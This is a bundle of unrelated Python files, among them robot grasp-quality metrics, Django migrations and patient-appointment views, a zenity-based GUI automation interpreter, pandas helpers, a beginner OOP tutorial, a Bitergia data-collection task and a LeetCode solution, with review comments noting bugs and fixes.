        # (a skew-symmetric matrix is not a rotation) — confirm against
        # look_at_general, which is imported above but unused.
        g = np.zeros((4, 4))
        g[:3, :3] = hat(normals[contact])
        g[:3, 3] = vertices[contact]
        g[3, 3] = 1
        # BUG FIX: the original called the undefined name g_inv() for contact 0
        # (NameError at runtime; its own commented-out np.linalg.inv line shows
        # the intent) and reused contact 0's normal/vertex for contact 1.
        g = np.linalg.inv(g)
        G[:, 4 * contact:4 * contact + 4] = np.matmul(adj(g).T, B)
    return G
def contact_forces_exist(vertices, normals, num_facets, mu, gamma, desired_wrench):
    """
    Compute whether the given grasp (at contacts with surface normals) can produce
    the desired_wrench. will be used for gravity resistance.

    Parameters
    ----------
    vertices : 2x3 :obj:`numpy.ndarray`
        obj mesh vertices on which the fingers will be placed
    normals : 2x3 :obj:`numpy.ndarray`
        obj mesh normals at the contact points
    num_facets : int
        number of vectors to use to approximate the friction cone. these vectors
        will be along the friction cone boundary
    mu : float
        coefficient of friction
    gamma : float
        torsional friction coefficient
    desired_wrench : :obj:`numpy.ndarray`
        potential wrench to be produced

    Returns
    -------
    bool : whether contact forces can produce the desired_wrench on the object
    """
    # BUG FIX: `import scipy` at the top of the file does not load the
    # optimize submodule; import it explicitly before use.
    import scipy.optimize

    # Look for a non-negative solution f of: desired_wrench = G @ f.
    G = get_grasp_map(vertices, normals, num_facets, mu, gamma)
    f, residual = scipy.optimize.nnls(G, desired_wrench)

    # BUG FIX: nnls always returns the best non-negative least-squares fit;
    # an exact solution only exists when the residual is (numerically) zero.
    # The original discarded the residual and could report unproducible
    # wrenches as producible.
    if residual > 1e-6:
        return False

    # Each contact force (fx, fy, fz, torque) must lie in its friction cone.
    for force in (f[:4], f[4:]):
        fx, fy, fz, torque = force
        if np.sqrt(fx ** 2 + fy ** 2) > mu * fz:  # tangential friction bound
            return False
        if fz <= 0:                               # normal force must press in
            return False
        if abs(torque) > gamma * fz:              # torsional friction bound
            return False
    return True
def compute_gravity_resistance(vertices, normals, num_facets, mu, gamma, object_mass):
    """
    Gravity produces some wrench on your object. Computes whether the grasp can
    produce an equal and opposite wrench.

    Parameters
    ----------
    vertices : 2x3 :obj:`numpy.ndarray`
        obj mesh vertices on which the fingers will be placed
    normals : 2x3 :obj:`numpy.ndarray`
        obj mesh normals at the contact points
    num_facets : int
        number of vectors to use to approximate the friction cone. these vectors will
        be along the friction cone boundary
    mu : float
        coefficient of friction
    gamma : float
        torsional friction coefficient
    object_mass : float
        mass of the object

    Returns
    -------
    float : quality of the grasp (feasibility of resisting gravity)
    """
    # Gravity acts along -z with magnitude m*g and exerts no torque about
    # the object origin.
    gravity_wrench = np.array([0, 0, -9.81 * object_mass, 0, 0, 0])
    # Fixed: the original also built the grasp map here, but the result was
    # never used — contact_forces_exist computes it itself.
    return contact_forces_exist(vertices, normals, num_facets, mu, gamma, gravity_wrench)
def compute_custom_metric(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width):
    """
    Robust Force Closure: Monte-Carlo estimate of the probability that the
    grasp remains force closure when the gripper width limits and the
    friction coefficient are perturbed with Gaussian noise.

    Parameters
    ----------
    vertices : 2x3 :obj:`numpy.ndarray`
        obj mesh vertices on which the fingers will be placed
    normals : 2x3 :obj:`numpy.ndarray`
        obj mesh normals at the contact points
    num_facets : int
        number of vectors to use to approximate the friction cone
    mu : float
        coefficient of friction
    gamma : float
        torsional friction coefficient
    object_mass : float
        mass of the object

    Returns
    -------
    float : fraction of perturbed trials that stay force closure (in [0, 1])
    """
    trials = 500
    means = np.array([gripper_min_width, gripper_max_width, mu])
    # Fixed perturbation scales: 5 mm on each width limit, 0.1 on mu.
    stds = np.array([0.005, 0.005, 0.1])

    successes = 0
    for _ in range(trials):
        sampled_min, sampled_max, sampled_mu = np.random.normal(loc=means, scale=stds)
        successes += compute_force_closure(vertices, normals, num_facets,
                                           sampled_mu, gamma, object_mass,
                                           sampled_min, sampled_max)
    return float(successes) / trials
def robust_force_closure(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width, stds):
    '''
    Monte-Carlo robustness of force closure with caller-supplied noise.

    stds : standard deviations for [gripper_min_width, gripper_max_width, mu]

    Returns the fraction of 200 perturbed trials that remain force closure.
    '''
    trials = 200
    means = np.array([gripper_min_width, gripper_max_width, mu])

    successes = 0
    for _ in range(trials):
        sampled_min, sampled_max, sampled_mu = np.random.normal(loc=means, scale=stds)
        successes += compute_force_closure(vertices, normals, num_facets,
                                           sampled_mu, gamma, object_mass,
                                           sampled_min, sampled_max)
    return float(successes) / trials
|
# Generated by Django 2.1.5 on 2019-04-02 01:40
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated Django (2.1.5) migration: relaxes two order FKs to
    nullable and resets defaults on seatsbought.expirationTime and
    theater.price."""

    dependencies = [
        ('ticketingApps', '0011_auto_20190401_1845'),
    ]

    operations = [
        # Make order.creditcard nullable; DO_NOTHING leaves rows untouched
        # when the referenced credit card is deleted.
        migrations.AlterField(
            model_name='order',
            name='creditcard',
            field=models.ForeignKey(db_column='CreditCard_CreditCardID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='ticketingApps.Creditcard'),
        ),
        # Same relaxation for the order -> profile relation.
        migrations.AlterField(
            model_name='order',
            name='profile',
            field=models.ForeignKey(db_column='Profile_UserID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='ticketingApps.Profile'),
        ),
        # NOTE(review): this default is a timestamp frozen at migration
        # generation time (2019-04-02 01:50 UTC), not "now" at insert time.
        migrations.AlterField(
            model_name='seatsbought',
            name='expirationTime',
            field=models.DateTimeField(default=datetime.datetime(2019, 4, 2, 1, 50, 2, 237693, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='theater',
            name='price',
            field=models.DecimalField(decimal_places=2, default=10, max_digits=10),
        ),
    ]
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from ..models import *
from datetime import datetime
# Create your views here.
def index(request, text):
    """Patient view for updating (or linking to cancellation of) an appointment.

    ``text`` is the appointment id, also reused to build the cancel link.
    GET renders the update/cancel form; POST validates the posted fields and
    reschedules the appointment.
    """
    user = request.user
    # Only users carrying the patient permission may edit appointments.
    testString = 'auth.patient' in user.get_all_permissions()
    if not testString:
        return HttpResponseRedirect("/notauthorized")
    patient=Patient.objects.get(userNameField=user.username)
    appointment = Appointment.objects.get(id=text)
    if request.method == "POST":
        month = request.POST.get('month', '')
        day = request.POST.get('day', '')
        year = request.POST.get('year', '')
        doctor = request.POST.get('doctor', '')
        time = request.POST.get('time', '')
        # All five fields are required; re-render the form with an error
        # message when any is missing.
        if month == '' or day == '' or year == '' or doctor == '' or time == '':
            return render(request, 'patients/patientUpdateCancelAppointment.html',
                          {"messagenum": get_number_of_unread(user),"name": patient.firstName + " " + patient.lastName, "errortext" : "Missing Required Field", "doctors" : Doctor.objects.order_by("firstName"),
                           "cancellink" : "/patientdeleteappointment/" + text})
        # NOTE(review): the doctor is matched by last name only (second word
        # of the posted value) — assumes unique doctor last names; confirm.
        appointment.doctor = Doctor.objects.get(lastName=doctor.split()[1])
        # NOTE(review): appends "00" seconds to the posted time; the format
        # '%H:%M%S' has no separator before %S — assumes time is 'HH:MM'.
        appointment.dateTime = datetime.strptime(month + ' ' + day + ' ' + year + ' ' + time + "00", '%m %d %Y %H:%M%S')
        appointment.save()
        log_add("Patient " + str(patient) + " updated an appointment.")
        return HttpResponseRedirect("/calendar")
    else :
        # GET: show the form pre-populated with the existing appointment.
        return render(request, 'patients/patientUpdateCancelAppointment.html', {"messagenum": get_number_of_unread(user),"name": patient.firstName + " " + patient.lastName,
                      "doctors" : Doctor.objects.order_by("firstName"),
                      "appointment": appointment,
                      "cancellink" : "/patientdeleteappointment/" + text})
def cancelAppointment(request, text):
    """Delete the appointment with id ``text``, log it, return to the calendar."""
    appt = Appointment.objects.get(id=text)
    appt.delete()
    # Identify the acting patient for the audit log.
    acting_patient = Patient.objects.get(userNameField=request.user.username)
    log_add("Patient " + str(acting_patient) + " cancelled an appointment.")
    return HttpResponseRedirect("/calendar")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#vim: set enc=utf8:
# More elaborate GUI-operations
# Supporting the AutoIT syntax would be nice
from .interact import Emulate, Screen
import os
class ScriptFiles:
    """A class for managing the directory with scripts.
    The name of the script is the same as the filename."""

    def __init__(self, path):
        self.path = path
        # Snapshot of the directory contents at construction time.
        self.filenames = os.listdir(path)

    def firstname(self, filename):
        """Return everything before the last '.', or the filename itself
        (with a warning) when it has no extension."""
        try:
            return filename[::-1].split(".", 1)[1][::-1]
        except IndexError:
            print("Filename does not have a first name: " + filename)
            return filename

    def lastname(self, filename):
        """Return the extension after the last '.', or the filename itself
        when it has no '.' at all."""
        try:
            return filename[::-1].split(".", 1)[0][::-1]
        except IndexError:
            print("Filename does not have a last name: " + filename)
            return filename

    def listscripts(self):
        """All filenames found in the script directory."""
        return self.filenames

    def getscriptbyfilename(self, filename):
        """Return the stripped contents of a known script file, else "".

        Fixed: the file handle is now closed via a context manager (the
        original leaked it on a read error).
        """
        contents = ""
        if filename in self.filenames:
            with open(os.path.join(self.path, filename)) as f:
                contents = f.read().strip()
        return contents

    def runscriptbyfirstname(self, firstname, settings):
        """Find firstname.nai or firstname.aut and run it with the
        matching interpreter."""
        if firstname + ".nai" in self.filenames:
            script = self.getscriptbyfilename(firstname + ".nai")
            interp = NaiveInterpreter(settings)
        elif firstname + ".aut" in self.filenames:
            script = self.getscriptbyfilename(firstname + ".aut")
            interp = AutoItInterpreter(settings)
        else:
            # BUG FIX: the original read `script` here before it was ever
            # assigned, raising NameError whenever no extension matched.
            print("Could not find an interpreter for that extension")
            return
        if not script:
            # Guard: an empty script would crash the interpreter's parser.
            print("Could not find any contents for that script")
            return
        interp.run_this(script)
        interp.close()
class Settings:
    """Settings for a specific automation run; can grow more fields later."""

    def __init__(self, guidelay=100):
        # Delay used by the emulator between GUI interactions.
        self.guidelay = guidelay
class Automation:
    """Couples a way to send keypresses (Emulate) with a way to read the
    screen (Screen)."""

    def __init__(self, settings):
        self.emu = Emulate(settings.guidelay)
        self.screen = Screen()

    def startapp(self, command):
        """Launch an application: press Alt+F2, click the screen centre,
        then type the command followed by Return."""
        emu = self.emu
        emu.alt("F2")
        emu.shortwait()
        emu.clickat(self.screen.center)
        emu.shortwait()
        emu.type(command + "\n")
        emu.longwait()

    def alttab(self):
        """Press Alt+Tab to switch windows."""
        emu = self.emu
        emu.alt("Tab")
        emu.shortwait()

    def say(self, text):
        """Type ``text`` followed by Return."""
        self.emu.type(text + "\n")
        self.emu.shortwait()

    def close(self):
        """Stop the key/mouse emulation."""
        self.emu.close()

    def getemu(self):
        """Return the Emulate object for sending keys and mouse clicks."""
        return self.emu

    def getscreen(self):
        """Return the Screen object for acquiring and interpreting graphics."""
        return self.screen
class GenericInterpreter:
    """A generic interpreter, meant to be subclassed.

    Subclasses must populate ``self.fdict`` (script function name -> bound
    method) and provide a ``value(s)`` method evaluating argument literals;
    the base class defines neither beyond an empty ``fdict``.
    """

    def __init__(self, settings):
        # Automation bundles key/mouse emulation with screen access.
        self.auto = Automation(settings)
        self.emu = self.auto.getemu()
        self.variables = {}
        # Dispatch table for script functions; filled in by subclasses.
        self.fdict = {}

    def info_msgbox(self, message, title):
        """Display an informal messagebox using Zenity.

        Returns the raw os.system() exit status — AutoItInterpreter.msgbox
        relies on this encoding (e.g. 256) when translating return values.
        NOTE(review): message/title are interpolated into a shell command
        unescaped; quotes or $() inside them would be shell-injected.
        """
        return os.system("zenity --info --text=\"%s\" --title=\"%s\"" % (message, title))

    def question_msgbox(self, message, title):
        """Display a messagebox that asks a question using Zenity
        (same return-value and injection caveats as info_msgbox)."""
        return os.system("zenity --question --text=\"%s\" --title=\"%s\"" % (message, title))

    def warning_msgbox(self, message, title):
        """Display a messagebox with a warning using Zenity
        (same return-value and injection caveats as info_msgbox)."""
        return os.system("zenity --warning --text=\"%s\" --title=\"%s\"" % (message, title))

    def close(self):
        """Close the Automation object"""
        self.auto.close()

    def call_function(self, s):
        """Call a function given as a text string. Example: function(arg1, arg2).

        Arguments are split on commas and evaluated with the subclass's
        ``value`` method; nested calls and commas inside string literals
        are not supported. Unknown names print an error and return "".
        """
        fun, arg = s.split("(")
        arguments = [self.value(x.strip()) for x in arg.split(")")[0].split(",")]
        # call the corresponding function with the given arguments
        try:
            return self.fdict[fun].__call__(*arguments)
        except KeyError as e:
            print("There is no such function: " + str(e))
            return ""

    def run_this(self, script):
        """Interpret and execute a script (lines of text)"""
        for line in script.strip().split("\n"):
            # TODO Interpret lines more than just calling functions
            if line.startswith("#"):
                # Skip lines that start with #
                continue
            retval = self.call_function(line.strip())
class NaiveInterpreter(GenericInterpreter):
    """Interpreter for a small, naive scripting language."""

    def __init__(self, settings):
        GenericInterpreter.__init__(self, settings)
        # Map script function names to their implementations.
        self.fdict = {
            "msgbox": self.msgbox,
            "run": self.run,
            "sleep": self.sleep,
            "click": self.click,
            "print": self.printfun,
            "screenshot": self.screenshot,
        }

    def value(self, s):
        """Strip surrounding double quotes from string literals; anything
        else passes through unchanged."""
        is_quoted = s.startswith('"') and s.endswith('"')
        return s[1:-1] if is_quoted else s

    def msgbox(self, message, title="Info"):
        """example: msgbox("Hello World!")"""
        return self.info_msgbox(message, title)

    def run(self, cmd):
        """Execute a shell command."""
        print("Running %s..." % (cmd))
        os.system(cmd)

    def sleep(self, n):
        """Pause via the emulator's sleep for ``n`` units."""
        self.emu.sleep(int(n))

    def click(self, x, y):
        """Click at screen coordinates (x, y)."""
        self.emu.clickat(int(x), int(y))

    def printfun(self, msg):
        """Print a message to stdout."""
        print(msg)

    def screenshot(self, filename="screenshot.png"):
        """Capture the virtual X framebuffer into ../screenshots/."""
        target = "../screenshots/" + filename
        # Point scrot at the virtual X display before capturing.
        os.putenv("DISPLAY", ":42.0")
        os.system("scrot " + target)
class AutoItInterpreter(GenericInterpreter):
    """Interpreter for (a small subset of) the AutoIt language."""

    def __init__(self, settings):
        GenericInterpreter.__init__(self, settings)
        # Map AutoIt function names to their implementations.
        self.fdict = {"MsgBox": self.msgbox}

    def value(self, s):
        """Evaluate a literal: booleans, double-quoted strings, else pass through."""
        #TODO Add more complex evaluation than just True and False...
        if s == "True":
            return True
        if s == "False":
            return False
        if s.startswith('"') and s.endswith('"'):
            return s[1:-1]
        return s

    def msgbox(self, flagstring, title, message, timeout=0, hwnd=0):
        """example: MsgBox(64, "Title", "Hello world")"""
        # TODO Support the other flags and paramters that MsgBox supports
        # See: http://www.autoitscript.com/autoit3/docs/functions/MsgBox.htm
        flag = int(flagstring)
        if flag in (0, 64):
            retval = self.info_msgbox(message, title)      # info box
        elif flag == 32:
            retval = self.question_msgbox(message, title)  # question box
        elif flag == 48:
            retval = self.warning_msgbox(message, title)   # warning box
        else:
            print("MsgBox, unknown flag: " + str(flag))
            retval = 0
        # Translate zenity/os.system exit statuses to AutoIt return values.
        if retval == 256:
            return 2
        if retval == 0:
            return 1
        return retval
|
import pandas as pd
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image as Img
from PIL import ImageTk as imgtk
import os
class DataProcessing(object):
    """Grab-bag of helpers for converting, cleaning and persisting data.

    Wraps ``data`` (typically a pandas Series/DataFrame or a plain
    sequence) and offers list/dict conversions, small file I/O utilities
    and an image-resize helper for the GUI.
    """

    def __init__(self, data):
        # The raw payload this instance operates on.
        self.data = data

    def get_datetime_from_twelve(self):
        """Round-trip self.data through batch.csv and return its datetime
        column (falling back to ``date`` when ``datetime`` is absent).

        NOTE(review): overwrites batch.csv in the CWD as a side effect.
        """
        frame = pd.DataFrame(self.data)
        frame.to_csv('batch.csv')
        frame = pd.read_csv('batch.csv')
        print(frame)
        try:
            return frame.datetime
        except (KeyError, AttributeError):
            # BUG FIX: pandas raises AttributeError (not KeyError) for a
            # missing column accessed as an attribute.
            return frame.date

    def get_ticker_from_twelve(self):
        """Return the first column of self.data after a CSV round-trip."""
        frame = pd.DataFrame(self.data)
        print(frame)
        frame.to_csv('batch.csv')
        from_disk = pd.read_csv('batch.csv')
        columns = frame.columns
        return from_disk[columns[0]]

    def real_data_to_double(self, real_data):
        """Convert a sequence of numeric strings/values to a float ndarray."""
        return np.array([float(x) for x in real_data])

    def generate_n_lenght_list(self, n):
        """Return [0, 1, ..., n-1]. (Misspelled name kept for API compatibility.)"""
        return list(range(n))

    def list_of_zeros(self, value):
        """Return (zeros, container): len(value)+1 zeros, plus the
        len(value)+1 None placeholders the original comprehension produced."""
        size = len(value) + 1
        return [0] * size, [None] * size

    def series_to_list(self, series):
        """Materialise any iterable (e.g. a pandas Series) into a list."""
        return [item for item in series]

    def remove_repeats(self, list1):
        """Return list1 with duplicates removed, keeping first-seen order."""
        unique = []
        for item in list1:
            if item not in unique:
                unique.append(item)
        return unique

    def find_location(self, value):
        """Return the 1-based position of the LAST occurrence of ``value``
        in self.data (via pandas ``isin``), or 0 when absent."""
        mask = self.data.isin([value])
        position = 0
        for index, hit in enumerate(mask, start=1):
            if hit:
                position = index
        return position

    def Convert(self, tup, di):
        """Group (key, value) pairs from ``tup`` into ``di`` as key -> [values]."""
        for key, val in tup:
            di.setdefault(key, []).append(val)
        return di

    def seperate_even_location_odd_location(self):
        """Split self.data by position into two DataFrames.

        Returns (odd_positions_frame, even_positions_frame) using 1-based
        numbering: element 0 goes to the "odd" frame, element 1 to "even".
        """
        seq = self.data
        at_even = []  # elements at 1-based even positions (index 1, 3, ...)
        at_odd = []   # elements at 1-based odd positions (index 0, 2, ...)
        for pos in range(len(seq)):
            if pos % 2 == 1:
                at_even.append(seq[pos])
            else:
                at_odd.append(seq[pos])
        return pd.DataFrame(at_odd), pd.DataFrame(at_even)

    def dictionary_to_dataframe(self, dic, Keys):
        """Build a DataFrame from dict ``dic``; ``Keys`` (str) names the key
        column. Scalar values land in a 'Values' column; list values are
        spread across 'Column 0..k' columns.

        NOTE(review): the value loop iterates range(len(dic) - 1) and so
        skips the last key — looks like an off-by-one, preserved as-is.
        (A plain pd.DataFrame(dict_of_columns) is usually a simpler route.)
        """
        lenght = list(range(len(dic)))  # row index 0..n-1 (original spelling kept)
        keys = list(dic)
        values = []
        for i in range(lenght[-1]):
            values.append(dic[keys[i]])
        df = pd.DataFrame(lenght)
        df[Keys] = pd.DataFrame(keys)
        try:
            df['Values'] = pd.DataFrame(values)
        except ValueError as verr:
            # Length mismatch: values are lists, so spread them column-wise.
            print(verr)
            values_width = []
            tuple_values_index = []
            for j in range(len(values)):
                for i in range(len(values[0])):
                    # (column_index, value) — the first slot is always the
                    # column position, the second the stored value.
                    tuple_values_index.append((i, values[j][i]))
            for j in range(len(values[0])):
                values_width.append([])
            print(tuple_values_index)
            for i in range(len(tuple_values_index)):
                for k in range(len(values[0])):
                    if tuple_values_index[i][0] == k:
                        values_width[k].append(tuple_values_index[i][1])
            for x in range(len(values_width)):
                df[f'Column {x}'] = pd.DataFrame(values_width[x])
            df.drop([0], axis=1, inplace=True)
        return df  # render with df.to_html('output.html') for the summary file

    @staticmethod
    def from_csv_to_html(dir_):
        """Render every .csv file under ``dir_`` to 'file 0', 'file 1', ...

        BUG FIX: made static (the original lacked ``self``, so instance
        calls received the instance as ``dir_``) and the output name is now
        an f-string — previously every table overwrote the literal file
        'file {i}'.
        NOTE(review): reads from the hard-coded relative folder ``app\\``.
        """
        files = os.listdir(dir_)
        for i, name in enumerate(files):
            if name.endswith('.csv'):
                table = pd.read_csv(r'app\{}'.format(name))
                table.to_html(f'file {i}')

    def save_to_text_doc(self, file_name, message):
        """Overwrite ``file_name`` with ``message`` (handle closed even on error)."""
        with open(file_name, 'w') as doc:
            doc.write(message)

    def textfile_i_o(self, filename, text, write):
        """Return the contents of ``filename``; append ``text`` when ``write``
        is truthy. Creates the file first when it does not exist."""
        try:
            handle = open(filename, 'r+')
        except FileNotFoundError:
            # Create an empty file, then reopen it for read/write.
            open(filename, 'w').close()
            handle = open(filename, 'r+')
        with handle:
            content = handle.read()
            if write:
                # File position is at EOF after read(), so this appends.
                handle.write(text)
        return content

    def apply_func_to_each_value_of_list(self, input_list, func):
        """Return [func(x) for x in input_list].

        BUG FIX: the original called map(input_list, func) with the
        arguments swapped, which raises TypeError when consumed.
        """
        return list(map(func, input_list))

    def __str__(self):
        # Print every attribute, then return the last "name : value" pair
        # (odd, but preserved from the original implementation).
        prop, val = None, None
        for prop, val in vars(self).items():
            print(prop, ':', val)
        return ''.join([prop, " : ", str(val)])

    def from_string_comma_string_to_int(self, h):
        """Split "a,b" into two numbers: ints when both convert, floats
        otherwise. Extra commas in the second part are dropped, matching
        the original character-scan behaviour."""
        left, _, rest = h.partition(',')
        right = rest.replace(',', '')
        try:
            return int(left), int(right)
        except ValueError:
            return float(left), float(right)

    def resize_image(self, width, height, filename):
        """Open ``filename``, resize it (with hard-coded corrections for two
        known assets) and return a Tk-compatible PhotoImage."""
        image = Img.open(filename)
        if filename == 'primary.PNG':
            width -= 60
            height -= 75
        elif filename == 'blue-box.png':
            height -= 55
        resized = image.resize((width, height))
        return imgtk.PhotoImage(resized)
|
# A lottery player record kept as a plain dict.
lotteryPlayer = {
    'name': 'jeffy',
    'numbers': (5, 9, 7, 8, 6),
}
class LotteryPlayer:
    """A lottery player with a fixed set of picked numbers."""

    def __init__(self, name):
        self.name = name
        self.numbers = (5, 9, 8, 9, 7)

    def total(self):
        """Sum of the player's picked numbers."""
        return sum(self.numbers)


# Object-oriented programming: instantiate two LotteryPlayer objects.
playerOne = LotteryPlayer("Jimmy")
playerTwo = LotteryPlayer("Jeffy")
print(playerOne.name)
print(playerTwo.name)
class Student:
    """A student with a name, a school and a list of marks."""

    def __init__(self, name, school):
        self.name = name
        self.school = school
        self.marks = []

    def average(self):
        """Arithmetic mean of the recorded marks."""
        return sum(self.marks) / len(self.marks)

    @staticmethod  # static methods receive no implicit 'self' argument
    def goToSchool():
        print("I'm going to school")

    @classmethod  # class methods receive the class as their first argument
    def printName(cls):
        print("Hello Hello ")


anna = Student("Anna", "MIT")
anna.marks.extend([56, 65])
anna.printName()
# Static method: callable straight off the class, no instance needed.
Student.goToSchool()
# Exercise 1
class Store:
    """A store holding priced items, with a classmethod alternate constructor."""

    def __init__(self, name):
        self.name = name
        self.items = []  # list of {'name': ..., 'price': ...} dicts

    def addItem(self, name, price):
        """Add one item with the given name and price to the inventory."""
        item = {
            'name': name,
            'price': price
        }
        self.items.append(item)

    def stockPrice(self):
        """Total price of every item currently in stock."""
        return sum(item['price'] for item in self.items)

    @classmethod
    def franchise(cls, store):
        """Alternate constructor: a new (empty) franchise of an existing store."""
        return cls(store.name + " - franchise")

    @staticmethod
    def storeDetails(store):
        """One-line summary of a store.

        BUG FIX: the original took an unused ``cls``, read an undefined
        global ``store``, and formatted the *method object*
        ``store.stockPrice`` instead of calling it.
        """
        return '{}, Total stock Price : {}'.format(store.name, int(store.stockPrice()))


storeProduct = Store("Biscuits")
storeProduct.addItem("Britannia", 50)
print(storeProduct.stockPrice())
# BUG FIX: the original passed the string "Amazon" to franchise(), which
# expects a Store and crashed on .name; print the new franchise's name.
print(storeProduct.franchise(storeProduct).name)
# Exercise 2
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Authors:
# Luis Cañas-Díaz <lcanas@bitergia.com>
# Alvaro del Castillo <acs@bitergia.com>
#
import logging
import time
from grimoire_elk.arthur import feed_backend
from grimoire_elk.elastic_items import ElasticItems
from grimoire_elk.elk.elastic import ElasticSearch
from mordred.error import DataCollectionError
from mordred.task import Task
from mordred.task_projects import TaskProjects
logger = logging.getLogger(__name__)
class TaskRawDataCollection(Task):
    """ Basic class shared by all collection tasks """

    def __init__(self, config, backend_section=None):
        super().__init__(config)
        self.backend_section = backend_section
        # This will be options in next iteration
        self.clean = False

    def execute(self):
        """Collect raw data for every repository of this backend section.

        Applies scroll/bulk sizes from the general config, honours the
        per-section 'collect' switch, skips filter-raw repositories, and
        feeds every remaining repo through feed_backend.

        Raises
        ------
        DataCollectionError
            when collecting from any repository fails.
        """
        cfg = self.config.get_conf()

        if 'scroll_size' in cfg['general']:
            ElasticItems.scroll_size = cfg['general']['scroll_size']
        if 'bulk_size' in cfg['general']:
            ElasticSearch.max_items_bulk = cfg['general']['bulk_size']

        # Collection can be switched off per backend section.
        if 'collect' in cfg[self.backend_section] and \
           cfg[self.backend_section]['collect'] == False:
            # Fixed: use the module logger, not the root logger.
            logger.info('%s collect disabled', self.backend_section)
            return

        t2 = time.time()
        logger.info('[%s] raw data collection starts', self.backend_section)
        clean = False
        fetch_cache = False
        if 'fetch-cache' in cfg[self.backend_section] and \
           cfg[self.backend_section]['fetch-cache']:
            fetch_cache = True

        # repos could change between executions because changes in projects
        repos = TaskProjects.get_repos_by_backend_section(self.backend_section)
        if not repos:
            logger.warning("No collect repositories for %s", self.backend_section)

        for repo in repos:
            p2o_args = self._compose_p2o_params(self.backend_section, repo)
            filter_raw = p2o_args['filter-raw'] if 'filter-raw' in p2o_args else None
            if filter_raw:
                # If filter-raw exists the goal is to enrich already collected
                # data, so don't collect anything
                logger.warning("Not collecting filter raw repository: %s", repo)
                continue
            url = p2o_args['url']
            backend_args = self._compose_perceval_params(self.backend_section, repo)
            logger.debug(backend_args)
            logger.debug('[%s] collection starts for %s', self.backend_section, repo)
            es_col_url = self._get_collection_url()
            ds = self.backend_section
            backend = self.get_backend(self.backend_section)
            project = None  # just used for github in cauldron

            try:
                feed_backend(es_col_url, clean, fetch_cache, backend, backend_args,
                             cfg[ds]['raw_index'], cfg[ds]['enriched_index'], project)
            except Exception as ex:
                # Fixed: a bare `except:` also swallowed SystemExit and
                # KeyboardInterrupt; catch Exception and chain the cause so
                # the original traceback is preserved.
                logger.error("Something went wrong collecting data from this %s repo: %s . "
                             "Using the backend_args: %s ", ds, url, str(backend_args))
                raise DataCollectionError('Failed to collect data from %s' % url) from ex

        t3 = time.time()
        spent_time = time.strftime("%H:%M:%S", time.gmtime(t3 - t2))
        logger.info('[%s] Data collection finished in %s',
                    self.backend_section, spent_time)
|
""" Given a list of words, list of single letters (might be repeating) and score of every character.
Return the maximum score of any valid set of words formed by using the given letters (words[i] cannot be used two or more times).
It is not necessary to use all characters in letters and each letter can only be used once. Score of letters 'a', 'b', 'c', ... ,'z' is given by score[0], score[1], ... , score[25] respectively.
Example 1:
Input: words = ["dog","cat","dad","good"], letters = ["a","a","c","d","d","d","g","o","o"], score = [1,0,9,5,0,0,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0]
Output: 23
Explanation:
Score a=1, c=9, d=5, g=3, o=2
Given letters, we can form the words "dad" (5+1+5) and "good" (3+2+2+5) with a score of 23.
Words "dad" and "dog" only get a score of 21.
Example 2:
Input: words = ["xxxz","ax","bx","cx"], letters = ["z","a","b","c","x","x","x"], score = [4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,0,10]
Output: 27
Explanation:
Score a=4, b=4, c=4, x=5, z=10
Given letters, we can form the words "ax" (4+5), "bx" (4+5) and "cx" (4+5) with a score of 27.
Word "xxxz" only get a score of 25.
Example 3:
Input: words = ["leetcode"], letters = ["l","e","t","c","o","d"], score = [0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0]
Output: 0
Explanation:
Letter "e" can only be used once.
Constraints:
1 <= words.length <= 14
1 <= words[i].length <= 15
1 <= letters.length <= 100
letters[i].length == 1
score.length == 26
0 <= score[i] <= 10
words[i], letters[i] contains only lower case English letters. """
from collections import Counter
from typing import List
class Solution:
    """Maximum score obtainable by forming disjoint words from a letter pool."""

    def maxScoreWords(self, words: List[str], letters: List[str], score: List[int]) -> int:
        """DFS over subsets of words, pruning any branch whose letter usage
        exceeds the available pool."""
        available = Counter(letters)
        used = Counter()
        best = 0

        def word_set_score(counts):
            # Score of the currently chosen letters.
            return sum(n * score[ord(ch) - ord('a')] for ch, n in counts.items())

        def explore(start):
            nonlocal best, used
            for j in range(start, len(words)):
                used += Counter(words[j])
                # Only score/recurse while the chosen words fit the pool.
                if all(used[ch] <= available[ch] for ch in used):
                    best = max(best, word_set_score(used))
                    explore(j + 1)
                used -= Counter(words[j])

        explore(0)
        return best


print(Solution().maxScoreWords(["dog","catw","dad","good"], ["a","a","c","d","d","d","g","o","o"], [1,0,9,5,0,0,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0]))
import glooper_python_swig_wrap as glooper
import rng_python_swig_wrap as rng

# Demo wiring for the Glooper market simulator (SWIG bindings): build a
# market, a set of random-number generators, and an agent population.
M = glooper.Market()
U = rng.UniformGenerator()
# ParetoGenerator(10000, 1.3) — presumably scale/shape parameters for a
# wealth-like heavy-tailed distribution; confirm against the C++ headers.
P = rng.ParetoGenerator(10000,1.3)
N = rng.NormalGenerator()
# NOTE(review): the meaning of the trailing 10 and of the repeated U
# arguments is not visible from here — confirm the C++ signature.
G = glooper.ClassicAgentGenerator(U,N,P,U,U,M,10)
AP = glooper.AgentPopulation(U,G)
|
import os
import sys
